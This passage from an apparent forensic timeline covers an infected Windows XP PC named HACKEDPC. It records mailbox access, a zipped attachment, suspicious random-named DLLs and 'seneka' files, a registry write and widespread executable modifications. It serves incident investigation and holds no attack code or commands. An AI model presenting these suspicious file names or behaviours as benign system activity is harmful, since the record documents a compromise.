CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 11:02:37 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 11:02:45 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 11:02:48 accessed conf.exe C:\\Program Files\NetMeeting\conf.exe Windows Executable Code\Executable File, Archive02/19/09 11:02:48 modified accwiz.exe C:\\WINDOWS\SYSTEM32\accwiz.exe Windows Executable Code\Executable File, Archive02/19/09 11:02:48 modified conf.exe C:\\Program Files\NetMeeting\conf.exe Windows Executable Code\Executable File, Archive02/19/09 11:02:48 modified fxscover.exe C:\\WINDOWS\SYSTEM32\fxscover.exe Windows Executable Code\Executable Match File, Archive02/19/09 11:02:48 modified mshta.exe C:\\WINDOWS\SYSTEM32\mshta.exe Windows Executable Code\Executable File, Archive02/19/09 11:02:48 modified ntbackup.exe C:\\WINDOWS\SYSTEM32\ntbackup.exe Windows Executable Code\Executable File, Archive02/19/09 11:02:48 modified unregmp2.exe C:\\WINDOWS\INF\unregmp2.exe Windows Executable Code\Executable File, Archive02/19/09 11:02:49 accessed unregmp2.exe C:\\WINDOWS\INF\unregmp2.exe Windows Executable Code\Executable File, Archive02/19/09 11:02:49 accessed wordpad.exe C:\\Program Files\Windows NT\Accessories\wordpad.exe Windows Executable Code\Executable File, Archive02/19/09 11:02:49 modified wordpad.exe C:\\Program Files\Windows NT\Accessories\wordpad.exe Windows Executable Code\Executable File, Archive02/19/09 11:02:51 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 11:02:52 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 11:02:58 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 11:16:39 modified cmd.exe C:\\WINDOWS\SYSTEM32\cmd.exe Windows Executable Code\Executable File, Archive02/19/09 11:16:45 modified ipconfig.exe C:\\WINDOWS\SYSTEM32\ipconfig.exe Windows Executable Code\Executable File, Archive
02/19/09 11:18:06 accessed Ken.mbx C:\My Documents\Qualcomm\Eudora\Ken.mbx02/19/09 11:18:18 accessed Misc.mbx C:\My Documents\Qualcomm\Eudora\Misc.mbx02/19/09 11:18:18 accessed Out.mbx C:\My Documents\Qualcomm\Eudora\Out.mbx
02/19/09 11:19:28 accessed senekaklpapjct.dat C:\\WINDOWS\SYSTEM32\senekaklpapjct.dat Data ASCII & Binary Code\Library ! Bad signature File, Archive02/19/09 11:19:28 accessed senekalwbrsnty.dat C:\\WINDOWS\SYSTEM32\senekalwbrsnty.dat Data ASCII & Binary Code\Library ! Bad signature File, Archive02/19/09 11:19:28 modified senekalwbrsnty.dat C:\\WINDOWS\SYSTEM32\senekalwbrsnty.dat Data ASCII & Binary Code\Library ! Bad signature File, Archive02/19/09 11:19:28 written senekalwbrsnty.dat C:\\WINDOWS\SYSTEM32\senekalwbrsnty.dat Data ASCII & Binary Code\Library ! Bad signature File, Archive
02/19/09 11:21:54 accessed Mike.mbx C:\Eudora\Mike.mbx02/19/09 11:21:54 accessed Misc.mbx C:\Eudora\Misc.mbx02/19/09 11:22:19 accessed Out.mbx C:\Eudora\Out.mbx
![Page 17: legend time activity name path/details](https://reader030.vdocument.in/reader030/viewer/2022013018/61d0cf0504243638ea4d819e/html5/thumbnails/17.jpg)
02/19/09 11:22:21 accessed Previous search.mbx C:\Eudora\Previous search.mbx02/19/09 11:22:21 accessed Scholarship.mbx C:\Eudora\Scholarship.mbx
02/19/09 11:24:00 accessed 37679041.pdf.zip C:\\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive File, Archive02/19/09 12:11:29 modified SafeBoot.scr C:\\WINDOWS\SafeBoot.scr Win NT Screen Saver Code\Executable File, Archive02/19/09 12:13:32 modified defrag.exe C:\\WINDOWS\SYSTEM32\defrag.exe Windows Executable Code\Executable File, Archive02/19/09 12:13:34 modified dfrgntfs.exe C:\\WINDOWS\SYSTEM32\dfrgntfs.exe Windows Executable Code\Executable File, Archive
02/19/09 12:20:39 accessed Mike.mbx C:\My Documents\Eudora\Mike.mbx02/19/09 12:20:50 accessed Misc.mbx C:\My Documents\Eudora\Misc.mbx02/19/09 12:22:33 accessed Out.mbx C:\My Documents\Eudora\Out.mbx02/19/09 12:23:07 accessed Previous search.mbx C:\My Documents\Eudora\Previous search.mbx02/19/09 12:23:30 accessed Scholarship.mbx C:\My Documents\Eudora\Scholarship.mbx
02/19/09 12:25:26 logged SysEvent.Evt EVENT ID: 1 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The System Restore filter encountered the unexpected error '0xC0000001' while processing the file '' on the volume 'Disk0'. It has stopped monitoring the volume. -02/19/09 12:40:52 modified helpsvc.exe C:\\WINDOWS\PCHEALTH\HELPCTR\BINARIES\helpsvc.exe Windows Executable Code\Executable File, Archive02/19/09 12:40:54 accessed helpsvc.exe C:\\WINDOWS\PCHEALTH\HELPCTR\BINARIES\helpsvc.exe Windows Executable Code\Executable File, Archive02/19/09 12:41:21 accessed WMIPRVSE.EXE-0D449B4F.pf C:\WINDOWS\Prefetch\WMIPRVSE.EXE-0D449B4F.pf02/19/09 12:41:21 written WMIPRVSE.EXE-0D449B4F.pf C:\WINDOWS\Prefetch\WMIPRVSE.EXE-0D449B4F.pf02/19/09 12:41:21 modified WMIPRVSE.EXE-0D449B4F.pf C:\WINDOWS\Prefetch\WMIPRVSE.EXE-0D449B4F.pf02/19/09 12:41:22 modified ntvdm.exe C:\\WINDOWS\SYSTEM32\ntvdm.exe Windows Executable Code\Executable File, Archive02/19/09 12:41:34 accessed CcEvtSvc.exe C:\\WINDOWS\SYSTEM32\CcEvtSvc.exe Windows Executable Code\Executable Match File, Archive02/19/09 12:41:35 accessed cmd.exe C:\\WINDOWS\SYSTEM32\cmd.exe Windows Executable Code\Executable File, Archive02/19/09 12:41:37 accessed ctfmon.exe C:\\WINDOWS\SYSTEM32\ctfmon.exe Windows Executable Code\Executable File, Archive02/19/09 12:41:44 accessed dwwin.exe C:\\WINDOWS\SYSTEM32\dwwin.exe Windows Executable Code\Executable Match File, Archive02/19/09 12:41:48 accessed hkcmd.exe C:\\WINDOWS\SYSTEM32\hkcmd.exe Windows Executable Code\Executable File, Archive02/19/09 12:42:13 accessed prunnet.exe C:\\WINDOWS\SYSTEM32\prunnet.exe Windows Executable Code\Executable Match File, Archive02/19/09 12:42:15 accessed reader_s.exe C:\\WINDOWS\SYSTEM32\reader_s.exe Windows Executable Code\Executable Match File, Archive02/19/09 12:42:36 accessed 143.tmp C:\\WINDOWS\SYSTEM32\143.tmp Windows Temporary Windows Match File, Archive02/19/09 12:42:36 accessed 145.tmp C:\\WINDOWS\SYSTEM32\145.tmp Windows Temporary Windows * Executable File, Archive02/19/09 12:42:36 accessed 147.tmp C:\\WINDOWS\SYSTEM32\147.tmp Windows Temporary Windows * Executable File, Archive02/19/09 12:42:36 accessed 148.tmp C:\\WINDOWS\SYSTEM32\148.tmp Windows Temporary Windows * Executable File, Archive02/19/09 12:42:36 accessed accwiz.exe C:\\WINDOWS\SYSTEM32\accwiz.exe Windows Executable Code\Executable File, Archive02/19/09 12:42:37 accessed DRWATSON.EXE C:\\WINDOWS\SYSTEM32\DRWATSON.EXE Windows Executable Code\Executable Match File, Archive02/19/09 12:42:37 accessed defrag.exe C:\\WINDOWS\SYSTEM32\defrag.exe Windows Executable Code\Executable File, Archive02/19/09 12:42:37 accessed dfrgntfs.exe C:\\WINDOWS\SYSTEM32\dfrgntfs.exe Windows Executable Code\Executable File, Archive02/19/09 12:42:37 accessed dumprep.exe C:\\WINDOWS\SYSTEM32\dumprep.exe Windows Executable Code\Executable File, Archive02/19/09 12:42:38 accessed fxscover.exe C:\\WINDOWS\SYSTEM32\fxscover.exe Windows Executable Code\Executable Match File, Archive02/19/09 12:42:38 accessed fxssvc.exe C:\\WINDOWS\SYSTEM32\fxssvc.exe Windows Executable Code\Executable File, Archive02/19/09 12:42:38 accessed geBtSIyX.dll C:\\WINDOWS\SYSTEM32\geBtSIyX.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 12:42:38 accessed igfxtray.exe C:\\WINDOWS\SYSTEM32\igfxtray.exe Windows Executable Code\Executable File, Archive02/19/09 12:42:38 accessed imapi.exe C:\\WINDOWS\SYSTEM32\imapi.exe Windows Executable Code\Executable File, Archive02/19/09 12:42:38 accessed ipconfig.exe C:\\WINDOWS\SYSTEM32\ipconfig.exe Windows Executable Code\Executable File, Archive02/19/09 12:42:38 accessed jdfjpl.dll C:\\WINDOWS\SYSTEM32\jdfjpl.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 12:42:39 accessed MPNOTIFY.EXE C:\\WINDOWS\SYSTEM32\MPNOTIFY.EXE Windows Executable Code\Executable File, Archive02/19/09 12:42:39 accessed mcrh.tmp C:\\WINDOWS\SYSTEM32\mcrh.tmp Windows Temporary Windows Match File, Archive02/19/09 12:42:39 accessed mshta.exe C:\\WINDOWS\SYSTEM32\mshta.exe Windows Executable Code\Executable File, Archive02/19/09 12:42:39 accessed mstsc.exe C:\\WINDOWS\SYSTEM32\mstsc.exe Windows Executable Code\Executable File, Archive02/19/09 12:42:40 accessed netsh.exe C:\\WINDOWS\SYSTEM32\netsh.exe Windows Executable Code\Executable File, Archive02/19/09 12:42:40 accessed ntbackup.exe C:\\WINDOWS\SYSTEM32\ntbackup.exe Windows Executable Code\Executable File, Archive02/19/09 12:42:40 accessed ntvdm.exe C:\\WINDOWS\SYSTEM32\ntvdm.exe Windows Executable Code\Executable File, Archive02/19/09 12:42:40 accessed pydesepr.dll C:\\WINDOWS\SYSTEM32\pydesepr.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 12:42:40 accessed rqRKEUkK.dll C:\\WINDOWS\SYSTEM32\rqRKEUkK.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 12:42:41 accessed ssqQkHBq.dll C:\\WINDOWS\SYSTEM32\ssqQkHBq.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 12:42:42 accessed userinit.exe C:\\WINDOWS\SYSTEM32\userinit.exe Windows Executable Code\Executable File, Archive02/19/09 12:42:42 accessed wvUmjIbx.dll C:\\WINDOWS\SYSTEM32\wvUmjIbx.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 12:51:33 accessed 37679041.pdf.zip C:\\My Documents\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive File, Archive02/19/09 14:19:50 accessed xccwinsys.ini C:\\WINDOWS\xccwinsys.ini Initialization Windows ! Bad signature File, Archive02/19/09 14:24:38 accessed SafeBoot.scr C:\\WINDOWS\SafeBoot.scr Win NT Screen Saver Code\Executable File, Archive02/19/09 14:24:48 accessed SAFEBOOT.SCR-13172D99.pf C:\WINDOWS\Prefetch\SAFEBOOT.SCR-13172D99.pf02/19/09 14:24:48 written SAFEBOOT.SCR-13172D99.pf C:\WINDOWS\Prefetch\SAFEBOOT.SCR-13172D99.pf02/19/09 14:24:48 modified SAFEBOOT.SCR-13172D99.pf C:\WINDOWS\Prefetch\SAFEBOOT.SCR-13172D99.pf02/19/09 14:42:56 accessed info_48[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\info_48[1] * Portable Network GraphicFile, Archive, Not Indexed02/19/09 14:42:56 created info_48[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\info_48[1] * Portable Network GraphicFile, Archive, Not Indexed02/19/09 14:42:56 modified info_48[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\info_48[1] * Portable Network GraphicFile, Archive, Not Indexed02/19/09 14:42:56 written info_48[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\info_48[1] * Portable Network GraphicFile, Archive, Not Indexed02/19/09 15:05:13 accessed rundll32.exe C:\\WINDOWS\SYSTEM32\rundll32.exe Windows Executable Code\Executable File, Archive02/19/09 15:05:15 accessed vgyixcnu.dll C:\\WINDOWS\SYSTEM32\vgyixcnu.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 15:05:23 accessed RUNDLL32.EXE-56884C6C.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-56884C6C.pf02/19/09 15:05:23 created RUNDLL32.EXE-56884C6C.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-56884C6C.pf02/19/09 15:05:23 written RUNDLL32.EXE-56884C6C.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-56884C6C.pf02/19/09 15:05:23 modified RUNDLL32.EXE-56884C6C.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-56884C6C.pf02/19/09 15:05:23 accessed RUNDLL32.EXE-56884C6C.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-56884C6C.pf02/19/09 15:05:23 created RUNDLL32.EXE-56884C6C.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-56884C6C.pf02/19/09 15:05:23 written RUNDLL32.EXE-56884C6C.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-56884C6C.pf02/19/09 15:05:23 modified RUNDLL32.EXE-56884C6C.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-56884C6C.pf02/19/09 15:05:42 created TASKMGR.EXE-06144C13.pf C:\WINDOWS\Prefetch\TASKMGR.EXE-06144C13.pf02/19/09 15:05:42 created TASKMGR.EXE-06144C13.pf C:\WINDOWS\Prefetch\TASKMGR.EXE-06144C13.pf02/19/09 15:05:53 accessed cbXQiFxw.dll C:\\WINDOWS\SYSTEM32\cbXQiFxw.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 15:05:53 accessed senekarxltpsnr.dll C:\\WINDOWS\SYSTEM32\senekarxltpsnr.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 15:05:57 accessed Eudora.exe C:\\Program Files\Qualcomm\Eudora\Eudora.exe Windows Executable Code\Executable File, Read Only, Archive02/19/09 15:05:58 accessed verclsid.exe C:\\WINDOWS\SYSTEM32\verclsid.exe Windows Executable Code\Executable File02/19/09 15:05:59 accessed VERCLSID.EXE-28F52AD2.pf C:\WINDOWS\Prefetch\VERCLSID.EXE-28F52AD2.pf02/19/09 15:05:59 written VERCLSID.EXE-28F52AD2.pf C:\WINDOWS\Prefetch\VERCLSID.EXE-28F52AD2.pf02/19/09 15:05:59 modified VERCLSID.EXE-28F52AD2.pf C:\WINDOWS\Prefetch\VERCLSID.EXE-28F52AD2.pf02/19/09 15:06:01 accessed SbTrayManager.exe C:\\Program Files\SafeBoot Tray Manager\SbTrayManager.exe Windows Executable Code\Executable File, Archive02/19/09 15:06:07 accessed uncxiygv.ini C:\\WINDOWS\SYSTEM32\uncxiygv.ini Initialization Windows ! Bad signature File, Hidden, System02/19/09 15:06:26 accessed taskmgr.exe C:\\WINDOWS\SYSTEM32\taskmgr.exe Windows Executable Code\Executable Match File, Archive02/19/09 15:06:39 accessed explorer.exe C:\\WINDOWS\explorer.exe Windows Executable Code\Executable File, Archive02/19/09 15:06:39 written seneka C:\\WINDOWS\SYSTEM32\CONFIG\SOFTWARE\NTRegistry\$$$PROTO.HIV\seneka Folder Folder, Registry Entry02/19/09 15:06:40 modified taskmgr.exe C:\\WINDOWS\SYSTEM32\taskmgr.exe Windows Executable Code\Executable Match File, Archive02/19/09 15:06:42 modified Icon84031A18.exe C:\\Documents and Settings\smith.99999\Application Data\Microsoft\Installer\{84031A18-BA9A-4156-A74F-E05B52DDFCE2}\Icon84031A18.exeWindows Executable Code\Executable File, Read Only, Archive02/19/09 15:06:42 modified NewShortcut2_F04825A0D1E9444AA8D32CE95CBF1716.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\NewShortcut2_F04825A0D1E9444AA8D32CE95CBF1716.exeWindows Executable Code\Executable Match File, Read Only, Archive02/19/09 15:06:42 modified Program_CheckNow_S_A865F9643D344747AD8AA93191B65DD3.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_CheckNow_S_A865F9643D344747AD8AA93191B65DD3.exeWindows Executable Code\Executable Match File, Read Only, Archive02/19/09 15:06:42 modified Program_FAQ_SC1_A865F9643D344747AD8AA93191B65DD3.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_FAQ_SC1_A865F9643D344747AD8AA93191B65DD3.exeWindows Executable Code\Executable Match File, Read Only, Archive02/19/09 15:06:42 modified Program_Help_SC1_A865F9643D344747AD8AA93191B65DD3.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_Help_SC1_A865F9643D344747AD8AA93191B65DD3.exeWindows Executable Code\Executable File, Read Only, Archive02/19/09 15:06:42 modified Program_Setting_SC_A865F9643D344747AD8AA93191B65DD3.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_Setting_SC_A865F9643D344747AD8AA93191B65DD3.exeWindows Executable Code\Executable Match File, Read Only, Archive02/19/09 15:06:42 modified SSLang.exe C:\\Program Files\Samsung\Samsung ML-2570 Series\Install\data\SSLang.exe Windows Executable Code\Executable File02/19/09 15:06:42 modified SSMMgr.exe C:\\WINDOWS\Samsung\PanelMgr\SSMMgr.exe Windows Executable Code\Executable File, Archive02/19/09 15:06:42 modified Ssopen.exe C:\\Program Files\Samsung\Samsung ML-2570 Series\Install\data\Ssopen.exe Windows Executable Code\Executable Match File02/19/09 15:06:42 modified Weather.exe C:\\Program Files\AWS\WeatherBug\Weather.exe Windows Executable Code\Executable File, Archive02/19/09 15:06:42 modified accicons.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\accicons.exe Windows Executable Code\Executable File, Read Only, Archive02/19/09 15:06:42 modified msimn.exe C:\\Program Files\Outlook Express\msimn.exe Windows Executable Code\Executable File, Archive02/19/09 15:06:42 modified mstsc.exe C:\\WINDOWS\SYSTEM32\mstsc.exe Windows Executable Code\Executable File, Archive02/19/09 15:06:42 modified pptico.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\pptico.exe Windows Executable Code\Executable File, Read Only, Archive02/19/09 15:06:42 modified setup.exe C:\\Program Files\Samsung\Samsung ML-2570 Series\Install\setup.exe Windows Executable Code\Executable File02/19/09 15:06:42 modified uninstall.exe C:\\Program Files\Coupons\uninstall.exe Windows Executable Code\Executable Match File, Archive02/19/09 15:06:42 modified wab.exe C:\\Program Files\Outlook Express\wab.exe Windows Executable Code\Executable File, Archive02/19/09 15:06:42 modified wordicon.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\wordicon.exe Windows Executable Code\Executable File, Read Only, Archive02/19/09 15:06:43 modified explorer.exe C:\\WINDOWS\explorer.exe Windows Executable Code\Executable File, Archive02/19/09 15:08:04 accessed regedit.exe C:\\WINDOWS\regedit.exe Windows Executable Code\Executable File, Archive02/19/09 15:08:04 modified regedit.exe C:\\WINDOWS\regedit.exe Windows Executable Code\Executable File, Archive02/19/09 15:08:14 accessed REGEDIT.EXE-2AE3423E.pf C:\WINDOWS\Prefetch\REGEDIT.EXE-2AE3423E.pf02/19/09 15:08:14 created REGEDIT.EXE-2AE3423E.pf C:\WINDOWS\Prefetch\REGEDIT.EXE-2AE3423E.pf
![Page 18: legend time activity name path/details](https://reader030.vdocument.in/reader030/viewer/2022013018/61d0cf0504243638ea4d819e/html5/thumbnails/18.jpg)
02/19/09 15:08:14 written REGEDIT.EXE-2AE3423E.pf C:\WINDOWS\Prefetch\REGEDIT.EXE-2AE3423E.pf02/19/09 15:08:14 modified REGEDIT.EXE-2AE3423E.pf C:\WINDOWS\Prefetch\REGEDIT.EXE-2AE3423E.pf02/19/09 15:08:14 accessed REGEDIT.EXE-2AE3423E.pf C:\WINDOWS\Prefetch\REGEDIT.EXE-2AE3423E.pf02/19/09 15:08:14 created REGEDIT.EXE-2AE3423E.pf C:\WINDOWS\Prefetch\REGEDIT.EXE-2AE3423E.pf02/19/09 15:08:14 written REGEDIT.EXE-2AE3423E.pf C:\WINDOWS\Prefetch\REGEDIT.EXE-2AE3423E.pf02/19/09 15:08:14 modified REGEDIT.EXE-2AE3423E.pf C:\WINDOWS\Prefetch\REGEDIT.EXE-2AE3423E.pf02/19/09 15:10:30 accessed taskkill.exe C:\\WINDOWS\SYSTEM32\taskkill.exe Windows Executable Code\Executable File, Archive02/19/09 15:10:30 modified taskkill.exe C:\\WINDOWS\SYSTEM32\taskkill.exe Windows Executable Code\Executable File, Archive02/19/09 15:10:40 created TASKKILL.EXE-1EEA7CB4.pf C:\WINDOWS\Prefetch\TASKKILL.EXE-1EEA7CB4.pf02/19/09 15:10:40 created TASKKILL.EXE-1EEA7CB4.pf C:\WINDOWS\Prefetch\TASKKILL.EXE-1EEA7CB4.pf02/19/09 15:11:34 accessed index.dat file:///C:/Program Files/AWS/WeatherBug/Local/center_failed.html History\Daily -02/19/09 15:13:30 accessed tasklist.exe C:\\WINDOWS\SYSTEM32\tasklist.exe Windows Executable Code\Executable File, Archive02/19/09 15:13:30 modified tasklist.exe C:\\WINDOWS\SYSTEM32\tasklist.exe Windows Executable Code\Executable File, Archive02/19/09 15:13:40 accessed TASKLIST.EXE-18943874.pf C:\WINDOWS\Prefetch\TASKLIST.EXE-18943874.pf02/19/09 15:13:40 created TASKLIST.EXE-18943874.pf C:\WINDOWS\Prefetch\TASKLIST.EXE-18943874.pf02/19/09 15:13:40 written TASKLIST.EXE-18943874.pf C:\WINDOWS\Prefetch\TASKLIST.EXE-18943874.pf02/19/09 15:13:40 modified TASKLIST.EXE-18943874.pf C:\WINDOWS\Prefetch\TASKLIST.EXE-18943874.pf02/19/09 15:13:40 accessed TASKLIST.EXE-18943874.pf C:\WINDOWS\Prefetch\TASKLIST.EXE-18943874.pf02/19/09 15:13:40 created TASKLIST.EXE-18943874.pf C:\WINDOWS\Prefetch\TASKLIST.EXE-18943874.pf02/19/09 15:13:40 written TASKLIST.EXE-18943874.pf C:\WINDOWS\Prefetch\TASKLIST.EXE-18943874.pf02/19/09 15:13:40 modified TASKLIST.EXE-18943874.pf C:\WINDOWS\Prefetch\TASKLIST.EXE-18943874.pf02/19/09 15:14:50 accessed TASKMGR.EXE-06144C13.pf C:\WINDOWS\Prefetch\TASKMGR.EXE-06144C13.pf02/19/09 15:14:50 written TASKMGR.EXE-06144C13.pf C:\WINDOWS\Prefetch\TASKMGR.EXE-06144C13.pf02/19/09 15:14:50 modified TASKMGR.EXE-06144C13.pf C:\WINDOWS\Prefetch\TASKMGR.EXE-06144C13.pf02/19/09 15:14:50 accessed TASKMGR.EXE-06144C13.pf C:\WINDOWS\Prefetch\TASKMGR.EXE-06144C13.pf02/19/09 15:14:50 written TASKMGR.EXE-06144C13.pf C:\WINDOWS\Prefetch\TASKMGR.EXE-06144C13.pf02/19/09 15:14:50 modified TASKMGR.EXE-06144C13.pf C:\WINDOWS\Prefetch\TASKMGR.EXE-06144C13.pf02/19/09 15:16:34 accessed index.dat file:///C:/Program Files/AWS/WeatherBug/Local/center_failed.html History\Daily -02/19/09 15:16:37 logged SysEvent.Evt EVENT ID: 26 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Application popup: taskkill.exe - DLL Initialization Failed : The application failed to initialize because the window station is shutting down. -02/19/09 15:16:37 accessed TASKKILL.EXE-1EEA7CB4.pf C:\WINDOWS\Prefetch\TASKKILL.EXE-1EEA7CB4.pf02/19/09 15:16:37 written TASKKILL.EXE-1EEA7CB4.pf C:\WINDOWS\Prefetch\TASKKILL.EXE-1EEA7CB4.pf02/19/09 15:16:37 modified TASKKILL.EXE-1EEA7CB4.pf C:\WINDOWS\Prefetch\TASKKILL.EXE-1EEA7CB4.pf02/19/09 15:16:37 accessed TASKKILL.EXE-1EEA7CB4.pf C:\WINDOWS\Prefetch\TASKKILL.EXE-1EEA7CB4.pf02/19/09 15:16:37 written TASKKILL.EXE-1EEA7CB4.pf C:\WINDOWS\Prefetch\TASKKILL.EXE-1EEA7CB4.pf02/19/09 15:16:37 modified TASKKILL.EXE-1EEA7CB4.pf C:\WINDOWS\Prefetch\TASKKILL.EXE-1EEA7CB4.pf